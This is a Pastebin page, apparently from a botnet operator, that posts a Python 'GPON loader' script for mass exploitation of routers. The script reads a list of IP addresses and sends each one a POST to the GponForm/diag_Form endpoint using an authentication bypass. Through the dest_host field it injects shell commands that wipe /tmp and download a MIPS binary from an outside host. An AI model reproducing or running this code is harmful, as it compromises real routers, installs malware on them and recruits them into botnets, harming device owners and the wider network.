xB4ckdoorREAL

[GPON LOADER] ROUTERS EXPLOIT

Oct 21st, 2018
808
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.08 KB | None | 0 0
  1. NEW DISCORD: https://discord.gg/PTW3yPp
  2.  
  3.  
  4. #!/usr/bin/env python
  5. #By: Choudai;
  6. import sys, requests, time, ssl, threading
  7.  
  8.  
  9. ctx = ssl.create_default_context()
  10. ctx.check_hostname = False
  11. ctx.verify_mode = ssl.CERT_NONE
  12. payload = 'cd /tmp/; rm -rf *; wget http://B4.CK.DO.OR/bins/mips.mips' #Binary
  13. exploit = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + payload + '`;' + payload + '&ipv=0'
  14. ips = open(sys.argv[1], 'r').readlines()
  15.  
  16.  
  17. class gpon(threading.Thread):
  18.         def __init__ (self, ip):
  19.             threading.Thread.__init__(self)
  20.             self.ip = str(ip).rstrip('\n')
  21.            
  22.         def run(self):
  23.             try:
  24.                 bypass = 'http://' + self.ip + '/GponForm/diag_Form?images/'
  25.                 req = requests.Request('POST', bypass, data=exploit)
  26.                 prepared = req.prepare()
  27.                 s = requests.Session()
  28.                 s.send(prepared)
  29.             except:
  30.                 pass
  31.  
  32.  
  33. for ip in ips:
  34.     try:
  35.         g = gpon(ip)
  36.         g.start()
  37.         time.sleep(0.1)
  38.     except:
  39.         pass
Add Comment
Please, Sign In to add comment